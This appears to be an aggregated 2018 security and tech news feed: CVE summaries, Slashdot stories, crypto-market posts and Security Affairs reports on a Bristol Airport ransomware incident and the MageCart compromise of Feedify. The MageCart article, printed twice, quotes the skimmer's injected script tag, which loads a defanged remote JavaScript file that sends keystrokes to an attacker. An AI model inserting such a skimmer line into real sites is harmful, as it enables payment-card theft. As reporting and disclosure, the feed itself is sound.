The WavFileBase class in WavFile.cpp in Olli Parviainen SoundTouch 2.0 allows remote attackers to cause a denial of service (heap corruption from size inconsistency) or possibly have unspecified other impact, as demonstrated by SoundStretch.

CVE-2018-17096

The BPMDetect class in BPMDetect.cpp in libSoundTouch.a in Olli Parviainen SoundTouch 2.0 allows remote attackers to cause a denial of service (assertion failure and application exit), as demonstrated by SoundStretch.

CVE-2018-17097

The WavFileBase class in WavFile.cpp in Olli Parviainen SoundTouch 2.0 allows remote attackers to cause a denial of service (double free) or possibly have unspecified other impact, as demonstrated by SoundStretch.

CVE-2018-17101

An issue was discovered in LibTIFF 4.0.9. There are two out-of-bounds writes in cpTags in tools/tiff2bw.c and tools/pal2rgb.c, which can cause a denial of service (application crash) or possibly have unspecified other impact via a crafted image file.

CVE-2018-17092

An issue was discovered in DonLinkage 6.6.8. SQL injection in /pages/proxy/php.php and /pages/proxy/add.php can be exploited via specially crafted input, allowing an attacker to obtain information from a database. The vulnerability can only be triggered by an authorized user.

CVE-2018-17090

An issue was discovered in DonLinkage 6.6.8. The modules /pages/bazy/bazy_adresow.php and /pages/proxy/add.php are vulnerable to stored XSS that can be triggered by closing <textarea> followed by <script></script> tags.

American Eating Habits Are Changing Faster than Fast Food Can Keep Up

Home cooking would be making a comeback if it ever really went away. From a report: Restaurants are getting dinged by the convenience of Netflix, the advent of pre-made meals, the spread of online grocery delivery, plus crushing student debt and a focus on healthy eating. Eighty-two percent of American meals are prepared at home -- more than were cooked 10 years ago, according to researcher NPD Group. The latest peak in restaurant-going was in 2000, when the average American dined out 216 times a year. That figure fell to 185 for the year ended in February, NPD said. Don't be fooled by reports of rising U.S. restaurant sales at big chains like McDonald's. Increases have been driven by price hikes, not more customers. Traffic for the industry was down 1.1 percent in July, the 29th straight month of declines, according to MillerPulse data. "It's counterintuitive because you see a lot of things in the press about restaurant sales increasing," said David Portalatin, a food-industry adviser at NPD. "America does still cook at home." The shift is weighing on the fast-food industry. Eateries already are struggling with higher labor and rent costs that they're passing along to customers, which in turn makes home cooking more economical. McDonald's, Jack in the Box, Shake Shack and Wendy's have all raised prices in the past year.

Read more of this story at Slashdot.

Intel Patched A Vulnerability Leaking Intel ME Encryption Keys

Despite continuous patches, Intel CPUs keep making the news for one or another vulnerabilities being spotted by researchers. While numerous

Intel Patched A Vulnerability Leaking Intel ME Encryption Keys on Latest Hacking News.

Beating the odds in market entry

mckinsey.com - How to avoid the cognitive biases that undermine market entry decisions. The annals of business history report that for every successful market entry, about four fail. Inexperienced start-ups suffer …


Tweeted by @RobertLaubscher https://twitter.com/RobertLaubscher/status/1041419726629609474

Security Affairs: Cyber attack took offline flight display screens at the Bristol Airport

The Bristol Airport was hit by a cyber attack that caused problems with operations, flight display screens were taken offline for two days.

The Bristol Airport was hit by a ransomware-based attack that caused problems to the flight display screens for two entire days.

The news reported by the BBC and was confirmed by an airport spokesman that explained that the information screens were taken offline early on Friday in response to a “ransomware” based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days.” state the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

The personnel started incident response and contingency measures, “manual processes” manual processes have made up for the interruption of the systems, spokesman refers of usage of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.

Bristol airpost attack

Source BBC – Image copyright JULIEANNE MCMAHON Image caption A spokesman said whiteboards and marker pens had to be used in place of display screens.

The experts don’t believe it was a targeted attack against the British critical infrastructure.

“The indications are that this was a speculative attempt rather than targeted attack on Bristol Airport.

The good news is that flights were not affected by the cyber attack

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”

Pierluigi Paganini

(Security Affairs – Bristol Airport, hacking)

The post Cyber attack took offline flight display screens at the Bristol Airport appeared first on Security Affairs.



Security Affairs

Cyber attack took offline flight display screens at the Bristol Airport

The Bristol Airport was hit by a cyber attack that caused problems with operations, flight display screens were taken offline for two days.

The Bristol Airport was hit by a ransomware-based attack that caused problems to the flight display screens for two entire days.

The news reported by the BBC and was confirmed by an airport spokesman that explained that the information screens were taken offline early on Friday in response to a “ransomware” based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days.” state the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

The personnel started incident response and contingency measures, “manual processes” manual processes have made up for the interruption of the systems, spokesman refers of usage of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.

Bristol airpost attack

Source BBC – Image copyright JULIEANNE MCMAHON Image caption A spokesman said whiteboards and marker pens had to be used in place of display screens.

The experts don’t believe it was a targeted attack against the British critical infrastructure.

“The indications are that this was a speculative attempt rather than targeted attack on Bristol Airport.

The good news is that flights were not affected by the cyber attack

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”

Pierluigi Paganini

(Security Affairs – Bristol Airport, hacking)

The post Cyber attack took offline flight display screens at the Bristol Airport appeared first on Security Affairs.

Who Needs Liquidity? Aurora (AOA) Recovers 251% On One Exchange

Aurora (AOA) was one of the hardest hit altcoins between August and September as AOA tokens fell 81% in value. That descent occurred over the space of just thirty-eight days, and marked a spectacular fall for a token that only launched in June. Now that same momentum appears to have reversed with AOA gaining 251% […]

The post Who Needs Liquidity? Aurora (AOA) Recovers 251% On One Exchange appeared first on Hacked: Hacking Finance.

Atlantic Council Panel on Cyber Warfare

c-span.org - *This transcript was compiled from uncorrected Closed Captioning. Panelists talked about the origin and process of developing the Tallinn Manual on the International Law Applicable to Cyber… Honorees…


Tweeted by @wendygirard https://twitter.com/wendygirard/status/1041413056968847360

India’s Space Agency Successfully Launches 2 UK Earth Observation Satellites

The late-night dark skies at Sriharikota, India, lit up in bright orange hues as the PSLV-C42 lifted off and vanished into the thick black clouds, carrying two satellites from the United Kingdom -- NovaSAR and S1-4 from the first launch pad at the Satish Dhawan Space Centre, SHAR. Local news outlet reports: The lightest version of the PSLV, flying in its core-alone version without the six strap-on motors, the PSLV-C-42 rose into the skies at 10.08 p.m. Almost 18 minutes later, the two satellites were placed in the desired orbit by ISRO. This was the 12th such launch of a core-alone version of the PSLV by ISRO. "This was a spectacular mission. We have placed the satellite in a very, very precise orbit," R. Hutton, Mission Director, said. The two satellites, owned by Surrey Satellite Technology Ltd (SSTL) were placed in a circular orbit around the poles, 583 km (362 miles) from Earth. The commercial arm of ISRO, Antrix Corporation earned more than â220 crore ($30.5 million) on this launch. The NovaSAR is a technology demonstration mission designed to test the capabilities of a new low cost S-band SAR platform. It will be used for ship detection and maritime monitoring and also flood monitoring, besides agricultural and forestry applications. The S1-4 will be used for environment monitoring, urban management, and tackling disasters. On the sidelines, the Indian Space Research Organization (ISRO) said it will launch three more satellites to provide high-speed bandwidth connectivity to rural areas as part of the government's Digital India programme, a local news agency reported.

Read more of this story at Slashdot.

India’s ISRO Successfully Launches 2 UK Earth Observation Satellites

The late-night dark skies at Sriharikota, India, lit up in bright orange hues as the PSLV-C42 lifted off and vanished into the thick black clouds, carrying two satellites from the United Kingdom -- NovaSAR and S1-4 from the first launch pad at the Satish Dhawan Space Centre, SHAR. Local news outlet reports: The lightest version of the PSLV, flying in its core-alone version without the six strap-on motors, the PSLV-C-42 rose into the skies at 10.08 p.m. Almost 18 minutes later, the two satellites were placed in the desired orbit by ISRO. This was the 12th such launch of a core-alone version of the PSLV by ISRO. "This was a spectacular mission. We have placed the satellite in a very, very precise orbit," R. Hutton, Mission Director, said. The two satellites, owned by Surrey Satellite Technology Ltd (SSTL) were placed in a circular orbit around the poles, 583 km (362 miles) from Earth. The commercial arm of ISRO, Antrix Corporation earned more than â220 crore ($30.5 million) on this launch. The NovaSAR is a technology demonstration mission designed to test the capabilities of a new low cost S-band SAR platform. It will be used for ship detection and maritime monitoring and also flood monitoring, besides agricultural and forestry applications. The S1-4 will be used for environment monitoring, urban management, and tackling disasters. On the sidelines, the Indian Space Research Organization (ISRO) said it will launch three more satellites to provide high-speed bandwidth connectivity to rural areas as part of the government's Digital India programme, a local news agency reported.

Read more of this story at Slashdot.

Good Crypto News: What It All Means

It was another one of those weeks.  Crypto prices hit rock bottom around $186 billion. Goldman Sachs backs away from it plans to offer a crypto trading desk.  Vitalik Buterin tells Bloomberg how little he thinks of Ethereum. Technical analysts give us little hope for getting bullish anytime soon. But that was before The New […]

The post Good Crypto News: What It All Means appeared first on Hacked: Hacking Finance.

Survey Finds 85% of Underserved Students Have Access To Only One Digital Device

A new research [PDF] on students who took the ACT test, conducted by the ACT Center for Equity in Learning, found that 85% of underserved (meaning low income, minority, or first generation in college) students had access to only one device at home, most often a smartphone. From a blog post: American Indian/Alaskan, Hispanic/Latino, and African American students had the least access. White and Asian students had the most. Nearly a quarter of students who reported that family income was less that $36,000 a year had access to only a single device at home, a 19% gap compared to students whose family income was more than $100,000.

Read more of this story at Slashdot.

Morpheus –TCP/UDP Manipulation Framework

Morpheus is an open source framework that can launch multiple attacks on the network using applications, such as ettercap, msgsnarf,

Morpheus –TCP/UDP Manipulation Framework on Latest Hacking News.

For Decades, Some of the Atomic Matter in the Universe Had Not Been Located. Recent Papers Reveal Where It Has Been Hiding

In a series of three recent papers, astronomers have identified the final chunks of all the ordinary matter in the universe. From a report: And despite the fact that it took so long to identify it all, researchers spotted it right where they had expected it to be all along: in extensive tendrils of hot gas that span the otherwise empty chasms between galaxies, more properly known as the warm-hot intergalactic medium, or WHIM. Early indications that there might be extensive spans of effectively invisible gas between galaxies came from computer simulations done in 1998. "We wanted to see what was happening to all the gas in the universe," said Jeremiah Ostriker, a cosmologist at Princeton University who constructed one of those simulations along with his colleague Renyue Cen. The two ran simulations of gas movements in the universe acted on by gravity, light, supernova explosions and all the forces that move matter in space. "We concluded that the gas will accumulate in filaments that should be detectable," he said. Except they weren't -- not yet. "It was clear from the early days of cosmological simulations that many of the baryons would be in a hot, diffuse form -- not in galaxies," said Ian McCarthy, an astrophysicist at Liverpool John Moores University. Astronomers expected these hot baryons to conform to a cosmic superstructure, one made of invisible dark matter, that spanned the immense voids between galaxies. The gravitational force of the dark matter would pull gas toward it and heat the gas up to millions of degrees. Unfortunately, hot, diffuse gas is extremely difficult to find. To spot the hidden filaments, two independent teams of researchers searched for precise distortions in the CMB, the afterglow of the Big Bang. As that light from the early universe streams across the cosmos, it can be affected by the regions that it's passing through. In particular, the electrons in hot, ionized gas (such as the WHIM) should interact with photons from the CMB in a way that imparts some additional energy to those photons. The CMB's spectrum should get distorted. Unfortunately the best maps of the CMB (provided by the Planck satellite) showed no such distortions. Either the gas wasn't there, or the effect was too subtle to show up. But the two teams of researchers were determined to make them visible. From increasingly detailed computer simulations of the universe, they knew that gas should stretch between massive galaxies like cobwebs across a windowsill. Planck wasn't able to see the gas between any single pair of galaxies. So the researchers figured out a way to multiply the faint signal by a million.

Read more of this story at Slashdot.

ICO Analysis: Block66

The mortgage market is one of the biggest financial markets in the world. The market in the United States is around $10 trillion dollars, but the worldwide figure of $33 trillion is even more impressive. Yet getting a mortgage is not easy as risk-averse institutions do not have business with many viable candidates. Even if […]

The post ICO Analysis: Block66 appeared first on Hacked: Hacking Finance.

Week in review: API security, malware-less email attacks, reversing the cybersecurity skills shortage

Here’s an overview of some of last week’s most interesting news and articles: What can we do to reverse the cybersecurity skills shortage? Having a strong pipeline of talent coming through is vital to help organizations and individuals protect themselves. How do you feed that pipeline, though? Verizon details breaches they were called in to investigate Last year, Verizon Enterprise Solutions released a Data Breach Digest that gathered 16 cybercrime case studies. This year, each … More

The post Week in review: API security, malware-less email attacks, reversing the cybersecurity skills shortage appeared first on Help Net Security.

CVE-2018-17088

The ProcessGpsInfo function of the gpsinfo.c file of jhead 3.00 may allow a remote attacker to cause a denial-of-service attack or unspecified other impact via a malicious JPEG file, because there is an integer overflow during a check for whether a location exceeds the EXIF data length. This is analogous to the CVE-2016-3822 integer overflow in exif.c. This gpsinfo.c vulnerability is unrelated to the CVE-2018-16554 gpsinfo.c vulnerability.

What is a chatbot, why you need it?

blog.openwebsolutions.in - If you have attempted to get in touch with a company, you would know the depth of frustration which one goes through. Calling does not help as the caller is put through a lengthy process which does n…


Tweeted by @Necio_news https://twitter.com/Necio_news/status/1041374909841256453

Diplomatische Krise wegen Russen-Spionage

tagesanzeiger.ch - Die russische Spionage in der Schweiz ist sehr penetrant geworden. Die vom Tamedia-Recherchedesk aufgedeckten Geheimdienstoperationen – gegen das Labor Spiez und die Anti-Doping-Agentur in Lausanne –…


Tweeted by @lennutrajektoor https://twitter.com/lennutrajektoor/status/1041372287038119936

The Linux Kernel Has Grown By 225,000 Lines of Code This Year, With Contributions From About 3,300 Developers

Here's an analysis of the Linux kernel repository that attempts to find some fresh numbers on the current kernel development trends. He writes: The kernel repository is at 782,487 commits in total from around 19.009 different authors. The repository is made up of 61,725 files and from there around 25,584,633 lines -- keep in mind there is also documentation, Kconfig build files, various helpers/utilities, etc. So far this year there has been 49,647 commits that added 2,229,836 lines of code while dropping 2,004,759 lines of code. Or a net gain of just 225,077 lines. Keep in mind there was the removal of some old CPU architectures and other code removed in kernels this year so while a lot of new functionality was added, thanks to some cleaning, the kernel didn't bloat up as much as one might have otherwise expected. In 2017 there were 80,603 commits with 3,911,061 additions and 1,385,507 deletions. Given just over one quarter to go, on a commit and line count 2018 might come in lower than the two previous years. Linus Torvalds remains the most frequent committer at just over 3% while the other top contributions to the kernel this year are the usual suspects: David S. Miller, Arnd Bergmann, Colin Ian King, Chris Wilson, and Christoph Hellwig. So far in 2018 there were commits from 3,320 different email addresses. This is actually significantly lower than in previous years.

Read more of this story at Slashdot.

Did PCHAIN’s Times Square Marketing Ploy Fall on Deaf Ears?

Little known altcoin, PCHAIN (PAI) just celebrated the successful launch of its testnet by hiring the Thomson-Reuters digital advertising screen in the middle of Times Square, New York. The prime advertising space garners an estimated 150 million unique impressions per year, and one screen costs roughly $7,000 for a day’s use. However, the effect on […]

The post Did PCHAIN’s Times Square Marketing Ploy Fall on Deaf Ears? appeared first on Hacked: Hacking Finance.

New Cold Boot Attacks Can Evade Current Mitigations

Many people tend to put laptops to ‘Sleep’ instead of shutting it down. Whether you’re at home, or at your

New Cold Boot Attacks Can Evade Current Mitigations on Latest Hacking News.

Medical records & patient-doctor recordings of thousands of people exposed

By Carolina

Another day, another trove of medical records leaked online, thanks to a misconfigured AWS S3 bucket. Medical records are considered to be sensitive documents and when a malicious third party has access to them it is a bad news as these records can be used for fraud, blackmailing and marketing purposes against patients’ will. However, […]

This is a post from HackRead.com Read the original post: Medical records & patient-doctor recordings of thousands of people exposed

Amazon Says It is Investigating Claims That Its Employees Are Taking Bribes To Sell Internal Data To Merchants To Help Them Increase Their Sales on the Website

Amazon.com is investigating internal leaks as it fights to root out fake reviews and other seller scams from its website, the company told WSJ. From the report: Employees of Amazon, primarily with the aid of intermediaries, are offering internal data and other confidential information that can give an edge to independent merchants selling their products on the site, according to sellers who have been offered and purchased the data, brokers who provide it and people familiar with internal investigations. The practice, which violates company policy, is particularly pronounced in China, according to some of these people, because the number of sellers there is skyrocketing. As well, Amazon employees in China have relatively small salaries, which may embolden them to take risks. In exchange for payments ranging from roughly $80 to more than $2,000, brokers for Amazon employees in Shenzhen are offering internal sales metrics and reviewers' email addresses, as well as a service to delete negative reviews and restore banned Amazon accounts, the people said. Amazon is investigating a number of cases involving employees, including some in the U.S., suspected of accepting these bribes, according to people familiar with the matter. An internal probe began in May after Eric Broussard, Amazon's vice president who oversees international marketplaces, was tipped off to the practice in China, according to people familiar with the matter. Amazon has since shuffled the roles of key executives in China to try to root out the bribery, one of these people said.

Read more of this story at Slashdot.

Trade Recommendation: Populous

The Populous/Bitcoin (PPT/BTC) pair took out resistance of 0.00056 on August 16, 2018. The breach triggered the breakout from the large falling wedge on the daily chart. The breakout looks valid because it was followed by a surge in volume and price. PPT/BTC managed to climb to as high as 0.00108 on August 17. Unfortunately, […]

The post Trade Recommendation: Populous appeared first on Hacked: Hacking Finance.

CVE-2018-17082

The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a "Transfer-Encoding: chunked" request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.

Automation: The Exaggerated Threat of Robots

It will take quite a lot of time before robots become cheaper than workers in emerging markets such as Africa, argues Nico Beckert of Flassbeck Economics, a consortium of researchers who aim to provide economics insights with a more realistic basis. From the post: All industrialized countries used low-cost labour to build industries and manufacture mass-produced goods. Today, labour is relatively inexpensive in Africa, and a similar industrialization process might take off accordingly. Some worry that industrial robots will block this development path. The reason is that robots are most useful when doing routine tasks -- precisely the kind of work that is typical of labour-intensive mass production. At the moment, however, robots are much too expensive to replace thousands upon thousands of workers in labour-intensive industries, most of which are in the very early stages of the industrialization process. Robots are currently best used in technologically more demanding fields like the automobile or electronics industry. Even a rapid drop in robot prices would not lead to the replacement of workers by robots in the short term in Africa where countries lag far behind in terms of fast internet and other information and communications technologies. They also lack well-trained IT experts. Other problems include an unreliable power supply, high energy costs and high financing costs for new technologies. For these reasons, it would be difficult and expensive to integrate robots and other digital technologies into African production lines.

Read more of this story at Slashdot.

E Hacking News – Latest Hacker News and IT Security News: 42 Million Emails And Passwords Uploaded To A Free, Public Hosting Service

 

A database comprising of a collection of a total number of 42 million records was uploaded on an anonymous file hosting service kayo.moe. recently. The collection included unique email addresses and plain text passwords alongside partial credit card data.

Troy Hunt, Australian security researcher and creator of the Have I Been Pwned data breach index site, was requested to analyze and check whether it was the aftereffect of an obscure data breach. He could determine that more than 91% of the passwords in the dataset were at that point already accessible in the Have I Been Pwned collection and that the filenames in the said collection don't point to a specific source in light of the fact that there is no single example for the breaches they showed up in.

In light of the format of the data, the list are in all probability expected for credential stuffing attacks, which consolidate into a single list cracked passwords and email addresses and run them consequently against different online services to hijack the user accounts that match them.

Sample of data from lists sent to Hunt

The reason for the utilization of the credential stuffing attacks lies behind the fact that these attacks, while exploiting the users, for convenience are probably going to reuse those credentials on various other sites.

"When I pulled the email addresses out of the file, I found almost 42M unique values. I took a sample set and found about 89% of them were already in HIBP which meant there was a significant amount of data I've never seen before.” Hunter wrote on a blog post.

The database contained an overall of 755 documents totalling 1.8GB.

Users are constantly encouraged though to utilize solid as well as diverse passwords for various accounts. Continuously empower multifaceted validation.



E Hacking News - Latest Hacker News and IT Security News

42 Million Emails And Passwords Uploaded To A Free, Public Hosting Service

 

A database comprising of a collection of a total number of 42 million records was uploaded on an anonymous file hosting service kayo.moe. recently. The collection included unique email addresses and plain text passwords alongside partial credit card data.

Troy Hunt, Australian security researcher and creator of the Have I Been Pwned data breach index site, was requested to analyze and check whether it was the aftereffect of an obscure data breach. He could determine that more than 91% of the passwords in the dataset were at that point already accessible in the Have I Been Pwned collection and that the filenames in the said collection don't point to a specific source in light of the fact that there is no single example for the breaches they showed up in.

In light of the format of the data, the list are in all probability expected for credential stuffing attacks, which consolidate into a single list cracked passwords and email addresses and run them consequently against different online services to hijack the user accounts that match them.

Sample of data from lists sent to Hunt

The reason for the utilization of the credential stuffing attacks lies behind the fact that these attacks, while exploiting the users, for convenience are probably going to reuse those credentials on various other sites.

"When I pulled the email addresses out of the file, I found almost 42M unique values. I took a sample set and found about 89% of them were already in HIBP which meant there was a significant amount of data I've never seen before.” Hunter wrote on a blog post.

The database contained an overall of 755 documents totalling 1.8GB.

Users are constantly encouraged though to utilize solid as well as diverse passwords for various accounts. Continuously empower multifaceted validation.

Microsoft September Patch Fixed 61 Vulnerabilities Including A Zero-Day

Last month, Microsoft Patch Tuesday addressed 60 vulnerabilities that also included two zero-day flaws. This month also, the tech giant

Microsoft September Patch Fixed 61 Vulnerabilities Including A Zero-Day on Latest Hacking News.

Security Affairs: Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service.  The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

but apparently, the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.



Security Affairs

Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service.  The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

but apparently, the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.

Weekly Forecast: Cryptocurrencies – Stable Recovery or Dead Cat Bounce?

After a volatile couple of weeks, the cryptocurrency market is showing signs of revival. Bitcoin and Ethereum have been the main catalysts for the recovery, though for entirely different reasons. Bitcoin is regaining its stability – a recently acquired status – while Ethereum appears to have stemmed a massive decline that was driven almost entirely by […]

The post Weekly Forecast: Cryptocurrencies – Stable Recovery or Dead Cat Bounce? appeared first on Hacked: Hacking Finance.

Why Edinburgh’s Clock is Almost Never on Time

Arrive in Edinburgh on any given day and there are certain things you can guarantee. One of which is, the time on the turret clock atop The Balmoral Hotel is always wrong. By three minutes, to be exact. From a report: While the clock tower's story is legendary in Edinburgh, it remains a riddle for many first-timers. To the untrained eye, the 58m-high landmark is simply part of the grand finale when surveyed from Calton Hill, Edinburgh's go-to city-centre viewpoint. There it sits to the left of the Dugald Stewart Monument, like a giant exclamation mark above the glazed roof of Waverley Train Station. Likewise, the sandstone baronial tower looks equally glorious when eyed from the commanding northern ramparts of Edinburgh Castle while peering out over the battlements. It is placed at the city's very centre of gravity, between the Old Town and the New Town, at the confluence of all business and life. Except, of course, that the dial's big hand and little hand are out of sync with Greenwich Mean Time. This bold irregularity is, in fact, a historical quirk first introduced in 1902 when the Edwardian-era building opened as the North British Station Hotel. Then, as now, it overlooked the platforms and signal boxes of Waverley Train Station, and just as porters in red jackets met guests off the train, whisking them from the station booking hall to the interconnected reception desk in the hotel's basement, the North British Railway Company owners wanted to make sure their passengers -- and Edinburgh's hurrying public -- wouldn't miss their trains. Given an extra three minutes, they reasoned, these travellers would have more time on the clock to collect their tickets, to reach their corridor carriages and to unload their luggage before the stationmaster's whistle blew. Still today, it is a calculated miscalculation that helps keep the city on time.

Read more of this story at Slashdot.

Protecting the connected barrels

deloitte.com - For years, cyber attackers have targeted crude oil and natural gas (O&G) companies, with attacks growing in frequency, sophistication, and impact as the industry employs ever more connected technolog…


Tweeted by @Taro_Siddiqui https://twitter.com/Taro_Siddiqui/status/1041323504023601152